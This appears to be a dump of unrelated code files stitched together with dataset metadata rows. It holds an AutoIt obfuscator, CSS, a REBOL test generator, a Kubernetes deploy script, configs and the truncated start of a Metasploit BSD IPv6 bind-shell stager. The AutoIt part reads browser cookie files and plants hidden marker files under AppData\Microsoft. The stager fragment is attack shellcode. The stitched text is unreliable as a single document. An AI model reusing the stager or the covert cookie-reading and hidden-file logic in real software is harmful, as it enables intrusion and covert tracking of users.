If $M8D5A722F600B4F29 = $Arg01 Then
If $ArgOpt03 = 1 Then
If $Arg02 <> '' Then
FileWrite($Var0093, $Arg02 & $CRLF)
Else
FileWrite($Var0093, $Arg02)
EndIf
EndIf
If $ArgOpt03 = 0 Then
FileWrite($Var0093, $Arg02 & $CRLF)
FileWrite($Var0093, $Var0092[$M8D5A722F600B4F29] & $CRLF)
EndIf
ElseIf $M8D5A722F600B4F29 < UBound($Var0092, 1) - 1 Then
FileWrite($Var0093, $Var0092[$M8D5A722F600B4F29] & $CRLF)
ElseIf $M8D5A722F600B4F29 = UBound($Var0092, 1) - 1 Then
FileWrite($Var0093, $Var0092[$M8D5A722F600B4F29])
EndIf
Next
FileClose($Var0093)
Return 1
EndFunc
Func FnInetCheckBlackList1()
If FileExists($AppDataDir & "\Microsoft\456E436F64654974\456E436F64654974.bak") Then
If Not CheckUserInfo() Then Exit
FnBlackListCheck()
Else
FnBlackListCheck()
EndIf
Return 1
EndFunc
Func FnBlackListCheck()
; Get http://www.autoitscript.com/fileman/users/SmOke_N/EnCodeIt_BlackList.dat
Local $Var0094, $Lines, $Var0096, $Var0097, $InetData = FnInetGet4()
If Not IsArray($InetData) Then Exit
; Get .autoitscript.com {...}member_id >25174< from firefox/cookie.dat
Local $CookieDataIE = FnGetCookieDataIE(), $CookieDataFireFox = FnGetFireFoxCookie_Member_ids()
FileDelete($ScriptDir & "\EnCodeItInfo\456E436F646549745F426C61636B4C697374.dat")
If IsArray($CookieDataIE) Or IsArray($CookieDataFireFox) Then
If IsArray($CookieDataIE) Then
For $i_Cookie = 1 To $CookieDataIE[0]
For $i_BlacklistDat = 2 To $InetData[0]
If $InetData[$i_BlacklistDat] = "PausingEnCodeItUsage" Then
MsgBox(16, "Warning!", "All usage has been temporarily suspened, this could be due to an update.", 5)
Exit
EndIf
If Number($CookieDataIE[$i_Cookie]) = Number($InetData[$i_BlacklistDat]) Then
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\AutoIt v3\EnCodeIt", "UserInfo", "REG_SZ", $gUseOfEnCodeItNotPermitted)
If Not FileExists($AppDataDir & "\Microsoft\456E436F64654974\456E436F64654974.bak") Then
DirCreate($AppDataDir & "\Microsoft\456E436F64654974")
FileClose(FileOpen($AppDataDir & "\Microsoft\456E436F64654974\456E436F64654974.bak", 2))
FileWriteLine($AppDataDir & "\Microsoft\456E436F64654974\456E436F64654974.bak", $gUseOfEnCodeItNotPermitted)
FileSetAttrib($AppDataDir & "\Microsoft\456E436F64654974", "+H", 1)
Else
DirRemove($AppDataDir & "\Microsoft\456E436F64654974", 1)
EndIf
Exit
EndIf
Next
Next
EndIf
If IsArray($CookieDataFireFox) Then
For $i_Cookie = 1 To $CookieDataFireFox[0]
For $i_BlacklistDat = 2 To $InetData[0]
If $InetData[$i_BlacklistDat] = "PausingEnCodeItUsage" Then Exit
If Number($CookieDataFireFox[$i_Cookie]) = Number($InetData[$i_BlacklistDat]) Then
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\AutoIt v3\EnCodeIt", "UserInfo", "REG_SZ", $gUseOfEnCodeItNotPermitted)
If Not FileExists($AppDataDir & "\Microsoft\456E436F64654974\456E436F64654974.bak") Then
DirCreate($AppDataDir & "\Microsoft\456E436F64654974")
FileClose(FileOpen($AppDataDir & "\Microsoft\456E436F64654974\456E436F64654974.bak", 2))
FileWriteLine($AppDataDir & "\Microsoft\456E436F64654974\456E436F64654974.bak", $gUseOfEnCodeItNotPermitted)
FileSetAttrib($AppDataDir & "\Microsoft\456E436F64654974", "+H", 1)
Else
DirRemove($AppDataDir & "\Microsoft\456E436F64654974", 1)
EndIf
Exit
EndIf
Next
Next
EndIf
Else
MsgBox(16, "Error", "You must be a registered member with AutoIt to use EnCodeIt.")
Exit
EndIf
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\AutoIt v3\EnCodeIt", "UserInfo", "REG_SZ", $gDataUserInfo)
If Not FileExists($AppDataDir & "\Microsoft\456E436F64654974\456E436F64654974.bak") Then
DirCreate($AppDataDir & "\Microsoft\456E436F64654974")
FileClose(FileOpen($AppDataDir & "\Microsoft\456E436F64654974\456E436F64654974.bak", 2))
FileWriteLine($AppDataDir & "\Microsoft\456E436F64654974\456E436F64654974.bak", $gDataUserInfo)
FileSetAttrib($AppDataDir & "\Microsoft\456E436F64654974", "+H", 1)
EndIf
Return 1
EndFunc
Func FnToNumber($Arg00)
Return Number($Arg00)
EndFunc
Func CheckUserInfo()
If RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\AutoIt v3\EnCodeIt", "UserInfo") == $gDataUserInfo And _
StringStripWS(FileRead($AppDataDir & "\Microsoft\456E436F64654974\456E436F64654974.bak"), 8) == $gDataUserInfo Then _
Return 1
Return SetError(1, 0, 0)
EndFunc
Func FnGetCookieDataIE()
Local $Var0094, $Autoitscript_txt_Data, $Var009D, $Var0096, $Var009F, $Var001D, $bCookieFileFound = False
Local $VarCookieDir = $UserProfileDir & "\Cookies\" & $UserName & "@autoitscript"
If Not FileExists($VarCookieDir & ".txt") Then
For $i = 1 To 100
If FileExists($VarCookieDir & "[" & $i & "].txt") Then
$bCookieFileFound = True
$Var009F &= $Var0094 = $VarCookieDir & "[" & $i & "].txt" & Chr(01)
EndIf
Next
If $bCookieFileFound Then
$Var009D = StringSplit(StringTrimRight($Var001D, 1), Chr(01))
For $Var00D4 = 1 To $Var009D[0]
$Autoitscript_txt_Data = StringSplit(StringStripCR(FileRead($Var009D[$Var00D4])), @LF)
If $Autoitscript_txt_Data[0] >= 2 Then $Var009F &= $Autoitscript_txt_Data[2] & Chr(01)
Next
Return StringSplit(StringTrimRight($Var009F, 1), Chr(01))
EndIf
Else ;"\Cookies\cw2k@autoitscript.txt present
$Autoitscript_txt_Data = StringSplit(StringStripCR(FileRead($VarCookieDir & ".txt")), @LF)
If $Autoitscript_txt_Data[0] >= 2 Then _
Return $Autoitscript_txt_Data[2]
EndIf
Return False
EndFunc
Func FnDecryFileData($Arg00)
Local $DecryData
For $Var00B1 = 1 To StringLen($Arg00)
Switch Asc(StringMid($Arg00, $Var00B1, 1))
Case FnToNumber("127") To FnToNumber("135")
$DecryData &= "A"
Case FnToNumber("136") To FnToNumber("144")
$DecryData &= "B"
Case FnToNumber("149") To FnToNumber("153")
$DecryData &= "C"
Case FnToNumber("154") To FnToNumber("162")
$DecryData &= "D"
Case FnToNumber("163") To FnToNumber("171")
$DecryData &= "E"
Case FnToNumber("172") To FnToNumber("180")
$DecryData &= "F"
Case FnToNumber("181") To FnToNumber("189")
$DecryData &= FnToNumber("0")
Case FnToNumber("190") To FnToNumber("198")
$DecryData &= FnToNumber("2")
Case FnToNumber("199") To FnToNumber("207")
$DecryData &= FnToNumber("4")
Case FnToNumber("208") To FnToNumber("216")
$DecryData &= FnToNumber("3")
Case FnToNumber("217") To FnToNumber("225")
$DecryData &= FnToNumber("5")
Case FnToNumber("226") To FnToNumber("234")
$DecryData &= FnToNumber("6")
Case FnToNumber("235") To FnToNumber("243")
$DecryData &= FnToNumber("8")
Case FnToNumber("244") To FnToNumber("252")
$DecryData &= FnToNumber("9")
Case FnToNumber("253") To FnToNumber("254")
$DecryData &= FnToNumber("7")
Case FnToNumber("255")
$DecryData &= FnToNumber("1")
EndSwitch
Next
Return BinaryString("0x" & $DecryData)
EndFunc
Func FnGetFireFoxCookie_Member_ids()
If Not FileExists($AppDataDir & "\Mozilla\Firefox\Profiles") Then Return SetError(1, 0, 0)
Local $member_ids, $FilesInProfiles, $FileData, $RegExpData
$FilesInProfiles = FnDir($AppDataDir & "\Mozilla\Firefox\Profiles")
If IsArray($FilesInProfiles) Then
;For all Files in "\Mozilla\Firefox\Profiles" Do
For $i = 0 To UBound($FilesInProfiles) - 1
If StringInStr(FileGetAttrib($FilesInProfiles[$i]), "D") And _
Not StringInStr(StringTrimLeft($FilesInProfiles[$i], StringLen($AppDataDir & "\Mozilla\Firefox\Profiles") + 1), "\") Then
$FileData = FileRead($FilesInProfiles[$i])
;Some line from cookies.txt
;.autoitscript.com TRUE /forum/ FALSE 1215984826 member_id 21435
$RegExpData = StringRegExp($FileData, ".autoitscript.com.+?member_id\s*(\d*)\n", 1)
For $index = 0 To UBound($RegExpData) - 1
$member_ids &= $RegExpData[$index] & Chr(01)
Next
EndIf
Next
Return StringSplit(StringTrimRight($member_ids, 1), Chr(01))
EndIf
EndFunc
Func FnInetGet4()
;If FnInetGet3("http://www.autoitscript.com//SmOke_N/EnCodeIt_BlackList.dat", $ScriptDir & "\EnCodeItInfo\456E436F646549745F426C61636B4C697374.dat", 1, 0) Then
If FnInetGet3("http://www.autoitscript.com/fileman/index.php?op=get&target=SmOke_N/EnCodeIt_BlackList.dat.txt", $ScriptDir & "\EnCodeItInfo\456E436F646549745F426C61636B4C697374.dat", 1, 0) Then
$EnCodeItInfo_Dat = StringSplit(StringStripCR(FnDecryFileData(FileRead($ScriptDir & "\EnCodeItInfo\456E436F646549745F426C61636B4C697374.dat"))), Chr(01))
Return $EnCodeItInfo_Dat
Else
MsgBox(16, "Error", "EnCodeIt must have access to the internet upon start up.")
Exit
EndIf
Return 0
EndFunc
Func FnDir($Arg00)
Local $search , $FoundFileName, $FileList
$search = FileFindFirstFile("*.*")
If $search = -1 Then Return SetError(1, 0, 0)
While 1
$FoundFileName = FileFindNextFile($search )
If @error Then ExitLoop
$FileList &= $Arg00 & "\" & $FoundFileName & Chr(01)
WEnd
FileClose($search )
Return StringSplit(StringTrimRight($FileList, 1), Chr(01))
EndFunc
Func FnInetGet($URL, $DownloadToFileName, $reload, $DownloadInBackground)
Return InetGet($URL, $DownloadToFileName, $reload, $DownloadInBackground)
EndFunc
Func FnInetGet3($URL, $DownloadToFileName, $reload, $DownloadInBackground, $ArgOpt04 = 1, $RetValFnInetGet = 8, $DoDownload = False)
$ArgOpt04 = FnInetGet2($URL, $DownloadToFileName, $reload, $DownloadInBackground, $DoDownload)
$RetValFnInetGet = FnInetGet($URL, $DownloadToFileName, $reload, $DownloadInBackground)
Return $RetValFnInetGet
EndFunc
Func FnInetGet2($URL, $DownloadToFileName, $reload, $DownloadInBackground, $DoDownload)
If Not $DoDownload Then Return 1
;Success: Returns 1
Return InetGet($URL, $DownloadToFileName, $reload, $DownloadInBackground)
EndFunc
Func FnFilesCleanUp()
If FileExists($ScriptDir & "\EnCodeItInfo\Compiled.au3") Then FileDelete($ScriptDir & "\EnCodeItInfo\Compiled.au3")
If FileExists($ScriptDir & "\EnCodeItInfo\Text.ini") Then FileDelete($ScriptDir & "\EnCodeItInfo\Text.ini")
If FileExists($ScriptDir & "\EnCodeItInfo\Var.ini") Then FileDelete($ScriptDir & "\EnCodeItInfo\Var.ini")
If FileExists($ScriptDir & "\EnCodeItInfo\Func.ini") Then FileDelete($ScriptDir & "\EnCodeItInfo\Func.ini")
If FileExists($ScriptDir & "\EnCodeItInfo\FuncReplace.ini") Then FileDelete($ScriptDir & "\EnCodeItInfo\FuncReplace.ini")
If FileExists($ScriptDir & "\EnCodeItInfo\Backup.back") Then FileDelete($ScriptDir & "\EnCodeItInfo\Backup.bak")
EndFunc
Func Fn009F()
DirRemove($ScriptDir & "\EnCodeItInfo", 1)
EndFunc
Func Fn00A0($Arg00, $Arg01, $ArgOpt02 = True)
Local $Var00AB = FileRead($Arg00)
FileClose(FileOpen($Arg00, 2))
If $ArgOpt02 Then
FileWrite($Arg00, $Arg01 & $CRLF & $Var00AB)
Else
FileWrite($Arg00, $Var00AB & $CRLF & $Arg01)
EndIf
Return 1
EndFunc
Func Fn00A1($Arg00)
Local $Lines = StringSplit(StringStripCR($Arg00), $lf)
Local $Var0051 = "Somethingreallylongandobnoxiousforreplacementoffunc"
Local $Arr0052[$Lines[0] + 1][2], $Var003A
For $Var004C = 1 To $Lines[0]
If StringLeft(StringStripWS($Lines[$Var004C], 8), 4) = "func" Then
$Var003A += 1
$Arr0052[$Var003A][0] = $Lines[$Var004C]
$Arr0052[$Var003A][1] = $Var0051 & $Var003A
EndIf
Next
ReDim $Arr0052[$Var003A + 1][2]
Return $Arr0052
EndFunc
Func Fn00A2($Arg00)
Local $Arr00B0[4], $Var00B1, $Var005A
If (StringIsAlpha(StringLeft($Arg00, 1)) Or StringLeft($Arg00, 1) = "_") And (StringIsAlpha(StringRight($Arg00, 1)) Or StringRight($Arg00, 1) = "_") Then
$Arr00B0[2] = $Arg00
Return $Arr00B0
EndIf
For $Var00B1 = 1 To StringLen($Arg00)
$Var005A = StringMid($Arg00, $Var00B1, 1)
If StringIsAlpha($Var005A) Or $Var005A = "_" Then
$Arr00B0[1] = StringMid($Arg00, $Var00B1 - 1, $Var00B1 - 1)
$Arg00 = StringTrimLeft($Arg00, $Var00B1 - 1)
For $Var00D4 = StringLen($Arg00) To 1 Step - 1
$Var005A = StringMid($Arg00, $Var00D4, 1)
If StringIsAlpha($Var005A) Or $Var005A = "_" Then
$Arr00B0[2] = StringTrimRight($Arg00, StringLen($Arg00) - ($Var00D4))
$Arr00B0[3] = StringReplace($Arg00, $Arr00B0[2], '')
ExitLoop
EndIf
Next
If $Arr00B0[2] = '' Then $Arr00B0[2] = $Arg00
ExitLoop
EndIf
Next
Return $Arr00B0
EndFunc
Func Fn00A3(ByRef $ArgRef00, $Arg01)
For $Var004C = UBound($ArgRef00) - 1 To 1 Step - 1
$Arg01 = StringReplace($Arg01, $ArgRef00[$Var004C][0], $ArgRef00[$Var004C][1], 0, 1)
Next
Return $Arg01
EndFunc
Func Fn00A4(ByRef $ArgRef00, $Arg01)
Local $Lines = StringSplit(StringStripCR($Arg01), @LF)
Local $Var001D
$Arg01 = ''
For $Var00D4 = 1 To $Lines[0]
For $Var004C = UBound($ArgRef00) - 1 To 1 Step - 1
If StringLeft($Lines[$Var00D4], StringLen($Lines[$Var00D4])) == $ArgRef00[$Var004C][1] Then
$Lines[$Var00D4] = StringReplace($Lines[$Var00D4], $ArgRef00[$Var004C][1], $ArgRef00[$Var004C][0], 1)
ExitLoop
EndIf
Next
$Arg01 &= $Lines[$Var00D4] & $CRLF
Next
Return StringTrimRight($Arg01, StringLen($CRLF))
EndFunc
Func Fn00A5($Arg00)
Local $Lines, $Var001D, $Var0059, $Var00B8
Local $Var00B9, $Var0050, $Var00BB, $Var00BC, $Arr0044[5] = ['', False, False, False, False]
Local $Var00BE = Fn00AE($ScriptDir & "\EnCodeItInfo\Text.ini", "Text")
If Not IsArray($Var00BE) Then Return $Arg00
If $Var00BE[1][0] = '' Then Return $Arg00
$Var0043 = Fn00AE($ScriptDir & "\EnCodeItInfo\FuncReplace.ini", "FunctionReplace")
If IsArray($Var0043) Then
$Arg00 = Fn00A4($Var0043, $Arg00)
$Arr0044[1] = True
EndIf
$Var00B9 = Fn00AA($Arg00, "hotkeyset", "\)")
If Not @error Then
$Arg00 = Fn00A7($Var00B9, $Arg00)
$Arr0044[2] = True
EndIf
$Var0050 = Fn00AA($Arg00, "fileinstall", ",")
If Not @error Then
$Arg00 = Fn00A7($Var0050, $Arg00)
$Arr0044[3] = True
EndIf
$Var00BC = Fn00AA($Arg00, "adlibenable", "\)")
If Not @error Then
$Arg00 = Fn00A7($Var00BC, $Arg00)
$Arr0044[4] = True
EndIf
$Arg00 = Fn00AD($Arg00)
If $Arr0044[1] Then $Arg00 = Fn00A3($Var0043, $Arg00)
If $Arr0044[2] Then $Arg00 = Fn00A6($Var00B9, $Arg00)
If $Arr0044[3] Then $Arg00 = Fn00A6($Var0050, $Arg00)
If $Arr0044[4] Then $Arg00 = Fn00A6($Var00BC, $Arg00)
Return $Arg00
EndFunc
Func Fn00A6(ByRef $ArgRef00, $Arg01)
For $Var004C = UBound($ArgRef00) - 1 To 1 Step - 1
$Arg01 = StringReplace($Arg01, $ArgRef00[$Var004C][1], $ArgRef00[$Var004C][0], 0, 1)
Next
Return $Arg01
EndFunc
Func Fn00A7(ByRef $ArgRef00, $Arg01)
For $Var004C = UBound($ArgRef00) - 1 To 1 Step - 1
$Arg01 = StringReplace($Arg01, $ArgRef00[$Var004C][0], $ArgRef00[$Var004C][1], 0, 1)
Next
Return $Arg01
EndFunc
Func Fn00A8($Arg00, $ArgOpt01 = 1, $ArgOpt02 = '')
If IsString($Arg00) Then Return Fn00A9($Arg00, $ArgOpt02)
If $ArgOpt02 = '' Then $ArgOpt02 = Chr(01)
Local $Var001D
Fn007F($Arg00, $ArgOpt01)
For $Var004C = $ArgOpt01 To UBound($Arg00) - 1
If StringInStr($ArgOpt02 & $Var001D, $ArgOpt02 & $Arg00[$Var004C] & $ArgOpt02, 1) Then ContinueLoop
If $Arg00[$Var004C] <> '' Then $Var001D &= $Arg00[$Var004C] & $ArgOpt02
Next
Return StringSplit(StringTrimRight($Var001D, StringLen($ArgOpt02)), $ArgOpt02)
EndFunc
Func Fn00A9($Arg00, $Arg01)
If IsArray($Arg00) Then Return Fn00A8($Arg00)
If StringRight($Arg00, StringLen($Arg01)) = $Arg01 Then $Arg00 = StringTrimRight($Arg00, StringLen($Arg01))
Local $Var005E = StringSplit(StringStripCR($Arg00), $Arg01), $Var001D
Fn007F($Var005E)
For $Var004C = 1 To $Var005E[0]
If StringInStr($Arg01 & $Var001D, $Arg01 & $Var005E[$Var004C] & $Arg01, 1) Then ContinueLoop
If $Var005E[$Var004C] <> '' Then $Var001D &= $Var005E[$Var004C] & $Arg01
Next
Return StringSplit(StringTrimRight($Var001D, StringLen($Arg01)), $Arg01)
EndFunc
Func Fn00AA($Arg00, $Arg01, $Arg02)
Local $Var0050 = Fn0088($Arg00, "\s" & $Arg01, $Arg02)
If Not @extended And Not IsArray($Var0050) Then Return SetError(1, 0, 0)
Local $Var0051 = "Somethingreallylongandobnoxiousforreplacementof" & StringStripWS($Arg01, 8)
$Var0050 = Fn00A8($Var0050, 0)
Local $Arr0052[$Var0050[0] + 1][2]
For $Var004C = 1 To $Var0050[0]
$Arr0052[$Var004C][0] = $Var0050[$Var004C]
$Arr0052[$Var004C][1] = $Var0051 & $Var004C
Next
Return $Arr0052
EndFunc
Func Fn00AB($Arg00)
Local $Var00C5 = Fn00AE($ScriptDir & "\EnCodeItInfo\Func.ini", "Funcs")
If Not IsArray($Var00C5) Then Return $Arg00
If $Var00C5[1][0] = '' Then Return $Arg00
For $Var00B1 = 1 To $Var00C5[0][0]
$Arr00B0 = Fn00A2($Var00C5[$Var00B1][0])
$Arg00 = StringReplace($Arg00, "'" & $Var00C5[$Var00B1][0] & "'", "'_!_" & $Var00C5[$Var00B1][1] & "'")
$Arg00 = StringReplace($Arg00, """" & $Var00C5[$Var00B1][0] & """", """_!_" & $Var00C5[$Var00B1][1] & """")
$Arg00 = StringRegExpReplace($Arg00, $Arr00B0[1] & "(\<" & $Arr00B0[2] & "\>)" & $Arr00B0[3], "_!_" & $Var00C5[$Var00B1][1])
Sleep($gSleepTime)
Next
Return StringReplace($Arg00, "_!_", '', 0, 1)
EndFunc
Func Fn00AC($Arg00)
Local $Var0086 = Fn00AE($ScriptDir & "\EnCodeItInfo\Var.ini", "Vars")
If Not IsArray($Var0086) Or $Var0086[1][0] = '' Then Return SetError(1, 0, $Arg00)
For $Var00B1 = 1 To $Var0086[0][0]
$Arg00 = StringReplace($Arg00, "$" & $Var0086[$Var00B1][0], "$@!~@`" & $Var0086[$Var00B1][1])
Sleep($gSleepTime)
Next
Return StringReplace($Arg00, "@!~@`", '')
EndFunc
Func Fn00AD($Arg00)
Local $Var0043, $Var0045 = False, $Var0046, $Var00CA, $Var0049, $Var004A
Local $Var00BE = Fn00AE($ScriptDir & "\EnCodeItInfo\Text.ini", "Text")
If Not IsArray($Var00BE) Then Return $Arg00
If $Var00BE[1][0] = '' Then Return $Arg00
Local $Var004B = StringReplace($Arg00, "'" & "'", ";" & ";")
$Var004B = StringReplace($Var004B, """" & """", "~" & "~")
$Var00CA = $Var004B
Local $Var003A = 0, $Var004E
While StringLen($Arg00) > 0
$Var004A = StringInStr($Var004B, "'")
$Var0049 = StringInStr($Var004B, """")
If Not $Var004A And Not $Var0049 Then ExitLoop
If $Var0049 > 0 And ($Var004A > $Var0049 Or $Var004A = 0) Then
$M8DAA72276C5B4F29 = """"
$Arg00 = StringTrimLeft($Arg00, $Var0049 - 1)
$Var004B = StringTrimLeft($Var004B, $Var0049 - 1)
Else
$M8DAA72276C5B4F29 = "'"
$Arg00 = StringTrimLeft($Arg00, $Var004A - 1)
$Var004B = StringTrimLeft($Var004B, $Var004A - 1)
EndIf
$M8D8A722F6C5B5F29 = StringInStr($Var004B, $M8DAA72276C5B4F29, 0, 2)
If $M8D8A722F6C5B5F29 > 0 Then
$Var0046 = StringLeft($Arg00, $M8D8A722F6C5B5F29)
For $Var00B1 = 1 To $Var00BE[0][0]
If $Var0046 == $Var00BE[$Var00B1][1] Then
If StringLen($Var0046) > 2 And StringInStr($Var0046, """" & """") Or StringInStr($Var0046, "'" & "'") Then
$Var00CA = StringReplace($Var00CA, ";" & ";", "'" & "'")
$Var00CA = StringReplace($Var00CA, "~" & "~", """" & """")
$Var00CA = StringReplace($Var00CA, $Var0046, "$" & $Var00BE[$Var00B1][0], 1)
$Var00CA = StringReplace($Var00CA, "'" & "'", ";" & ";")
$Var00CA = StringReplace($Var00CA, """" & """", "~" & "~")
Else
$Var00CA = StringReplace($Var00CA, $Var0046, "$" & $Var00BE[$Var00B1][0], 1)
EndIf
ExitLoop
EndIf
Next
$Arg00 = StringTrimLeft($Arg00, $M8D8A722F6C5B5F29)
$Var004B = StringTrimLeft($Var004B, $M8D8A722F6C5B5F29)
Else
ExitLoop
EndIf
Sleep($gSleepTime)
WEnd
$Var00CA = StringReplace($Var00CA, ";" & ";", "'" & "'")
$Var00CA = StringReplace($Var00CA, "~" & "~", """" & """")
Return $Var00CA
EndFunc
Func Fn00AE($Arg00, $Arg01)
Local $Var00D1 = FileGetSize($Arg00) / 1024
If $Var00D1 <= 31 Then Return IniReadSection($Arg00, $Arg01)
Local $Var00A6 = FileRead($Arg00), $Var001D, $Var00D4, $Var00D5 = 1
Local $Lines = StringSplit(StringStripCR($Var00A6), @LF)
For $Var00D4 = 1 To $Lines[0]
If StringLeft(StringStripWS($Lines[$Var00D4], 7), StringLen(StringStripWS("[" & $Arg01 & "]", 7))) = StringStripWS("[" & $Arg01 & "]", 7) Then
For $M8D5A722F6C5B1F29 = $Var00D4 + 1 To $Lines[0]
If StringLeft(StringStripWS($Lines[$M8D5A722F6C5B1F29], 8), 1) = "[" Then ExitLoop
$Var001D &= $Lines[$M8D5A722F6C5B1F29] & Chr(01)
Next
ExitLoop
EndIf
Next
If $Var001D = '' Then Return SetError(1, 0, 0)
$Var001D = StringSplit(StringTrimRight($Var001D, 1), Chr(01))
FileWriteLine(@TempDir & "\IniReadSectionTemp" & $Var00D5 & ".ini", "[" & $Arg01 & "]")
For $Var00B1 = 1 To $Var001D[0]
If FileGetSize(@TempDir & "\IniReadSectionTemp" & $Var00D5 & ".ini") / 1024 > 25 Then
$Var00D5 += 1
FileWriteLine(@TempDir & "\IniReadSectionTemp" & $Var00D5 & ".ini", "[" & $Arg01 & "]")
EndIf
FileWriteLine(@TempDir & "\IniReadSectionTemp" & $Var00D5 & ".ini", $Var001D[$Var00B1])
Next
Local $Var00D7, $Var00D8, $Var00D9
For $M8D5A722B695B4F29 = 1 To $Var00D5
$Var00D7 = IniReadSection(@TempDir & "\IniReadSectionTemp" & $M8D5A722B695B4F29 & ".ini", $Arg01)
If $M8D5A722B695B4F29 = 1 Then
$Var00D8 = $Var00D7
FileDelete(@TempDir & "\IniReadSectionTemp" & $M8D5A722B695B4F29 & ".ini")
Else
$Var00D9 = UBound($Var00D8, 1) - 1
ReDim $Var00D8[($Var00D9 + 1) + $Var00D7[0][0]][2]
For $M8D5A722F68544F29 = 1 To $Var00D7[0][0]
$Var00D8[$M8D5A722F68544F29 + $Var00D9][0] = $Var00D7[$M8D5A722F68544F29][0]
$Var00D8[$M8D5A722F68544F29 + $Var00D9][1] = $Var00D7[$M8D5A722F68544F29][1]
Next
FileDelete(@TempDir & "\IniReadSectionTemp" & $M8D5A722B695B4F29 & ".ini")
EndIf
Next
$Var00D8[0][0] = UBound($Var00D8, 1) - 1
Return $Var00D8
EndFunc | AutoIt | 3 | fossabot/myAut2Exe | samples/EnCodeIt2 Src Reloaded/EnCodeIt2-reloaded.au3 | [
"MS-PL"
] |
.error-display {
box-sizing: border-box;
padding: 20px;
text-align: center;
}
.error-display > .header {
font-size: 6rem;
margin: 0;
}
.error-display > .body {
color: #444;
font-size: 1.2rem;
}
.error-display > .links {
margin-top: 16px;
}
.error-display > .links > .link {
color: rgb(87, 114, 245);
text-decoration: none;
}
.error-display > .links > .link:hover {
text-decoration: underline;
}
.error-display .success {
color: green;
}
| CSS | 3 | anniyanvr/code-server | src/browser/pages/error.css | [
"MIT"
] |
{$(1) = "xxx"; print $1,$0}
| Logos | 1 | Crestwave/goawk | testdata/t.5.x | [
"MIT"
] |
REBOL [
Title: "Generates Red/System dylib tests"
Author: "Peter W A Wood"
File: %make-dylib-auto-test.r
Version: 0.2.0
Rights: "Copyright (C) 2012-2015 Peter W A Wood. All rights reserved."
License: "BSD-3 - https://github.com/red/red/blob/origin/BSD-3-License.txt"
]
do %create-dylib-auto-test.r
do %compile-test-dylibs.r
dir-out: %auto-tests
make-dir dir-out
exe-dir-out: clean-path %../../../../quick-test/runnable/
make-dir exe-dir-out
dll-target: switch/default fourth system/version [
2 ["Darwin"]
3 ["Windows"]
7 ["FreeBSD"]
][
"Linux"
]
compile-test-dylibs dll-target dir-out
create-dylib-auto-test dll-target dir-out exe-dir-out | R | 3 | 0xflotus/red | system/tests/source/units/make-dylib-auto-test.r | [
"BSL-1.0",
"BSD-3-Clause"
] |
#!/usr/bin/env bash
set -o pipefail
set -o errexit
set -o nounset
# set -o xtrace
# Set magic variables for current FILE & DIR
__dir="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
__kube="${__dir}"
__companion="$(dirname "$(dirname "${__kube}")")"
# Install kubectl
curl -LO https://storage.googleapis.com/kubernetes-release/release/v1.18.1/bin/linux/amd64/kubectl
chmod +x ./kubectl
mkdir -p ${HOME}/.local/bin/
export PATH="${HOME}/.local/bin/:$PATH"
mv ./kubectl ${HOME}/.local/bin/
# Store the new image in docker hub
docker build -t transloadit/companion:latest -t transloadit/companion:$TRAVIS_COMMIT .;
docker login -u="$DOCKER_USERNAME" -p="$DOCKER_PASSWORD";
# Push the commit tagged docker image.
docker push transloadit/companion:$TRAVIS_COMMIT;
# If this build includes a git tag, tag the image with the git version tag and push the version.
if [[ ! -z "${TRAVIS_TAG}" ]]; then
docker tag transloadit/companion:$TRAVIS_COMMIT transloadit/companion:$TRAVIS_TAG;
docker push transloadit/companion:$TRAVIS_TAG;
fi
# Lastly, update the pointer to latest.
docker push transloadit/companion:latest;
echo "Create directory..."
mkdir ${HOME}/.kube
echo "Writing KUBECONFIG to file..."
echo $KUBECONFIGVAR | python -m base64 -d > ${HOME}/.kube/config
echo "KUBECONFIG file written"
sleep 10s # This cost me some precious debugging time.
kubectl set image statefulset companion --namespace=companion companion=docker.io/transloadit/companion:$TRAVIS_COMMIT
sleep 10s
kubectl get pods --namespace=companion
kubectl get service --namespace=companion
kubectl get deployment --namespace=companion
function cleanup {
printf "Cleaning up...\n"
rm -vf ${HOME}/.kube/config
printf "Cleaning done."
}
trap cleanup EXIT
| Shell | 4 | camiloforero/uppy | packages/@uppy/companion/infra/kube/gcloud-deploy.sh | [
"MIT"
] |
SmalltalkCISpec {
#loading : [],
#testing : {
#allTestCases : true,
#defaultTimeout : 10,
#hidePassingTests : true,
#exclude : {
#classes : [
#BrowserTest,
#ClosureCompilerTest,
#DecompilerTests,
#ExceptionTests,
#FileList2ModalDialogsTest,
#FontTest,
#IslandVMTweaksTestCase,
#LangEnvBugs,
#LocaleTest,
#MVCToolBuilderTests,
#PackageDependencyTest,
#SocketTest,
#SqueakSSLTest,
#StandardSystemFontsTest,
#UnimplementedCallBugz,
#WebClientServerTest,
#FileHandleTest,
#GLMTextMorphicTest,
#GTSpotterStepFilteringTest,
#GTSpotterTest,
#NetNameResolverTest,
#PharoIssueTest,
#ReleaseTest,
#SimulateMouseSpecification,
#ZnCharacterEncoderTests,
#ZnResponseTests
],
#categories : [ 'TxText*' ]
}
}
}
| STON | 3 | pavel-krivanek/opensmalltalk-vm | tests/smalltalk.ston | [
"MIT"
] |
const { ModuleFederationPlugin } = require("../../../").container;
/** @type {import("../../../").Configuration} */
module.exports = {
mode: "production",
entry: "./index.js",
output: {
filename: "[name]_bundle.js"
},
plugins: [
new ModuleFederationPlugin({
name: "container",
exposes: {
"./entry": {
import: "./entry",
name: "custom-entry"
}
}
})
]
};
| JavaScript | 3 | fourstash/webpack | test/statsCases/module-federation-custom-exposed-module-name/webpack.config.js | [
"MIT"
] |
;;
;
; Name: stager_sock_bind_ipv6
; Qualities: Can Have Nulls
; Version: $Revision: 1628 $
; License:
;
; This file is part of the Metasploit Exploit Framework
; and is subject to the same licenses and copyrights as
; the rest of this package.
;
; Description:
;
; Implementation of a BSD portbind over IPv6 TCP stager.
;
; Meta-Information:
;
; meta-shortname=BSD Bind TCP Stager
; meta-description=Listen on a port for a connection and run a second stage
; meta-authors=skape <mmiller [at] hick.org>, vlad902 <vlad902 [at] gmail.com>, hdm <hdm [at] metasploit.com>
; meta-os=bsd
; meta-arch=ia32
; meta-category=stager
; meta-connection-type=bind
; meta-name=bind_tcp_ipv6
; meta-basemod=Msf::PayloadComponent::BindConnection
; meta-offset-lport=26
;;
BITS 32
GLOBAL main
main:
socket:
xor eax, eax
push eax ; Protocol: (IP=0)
inc eax
push eax ; Type: (SOCK_STREAM=1)
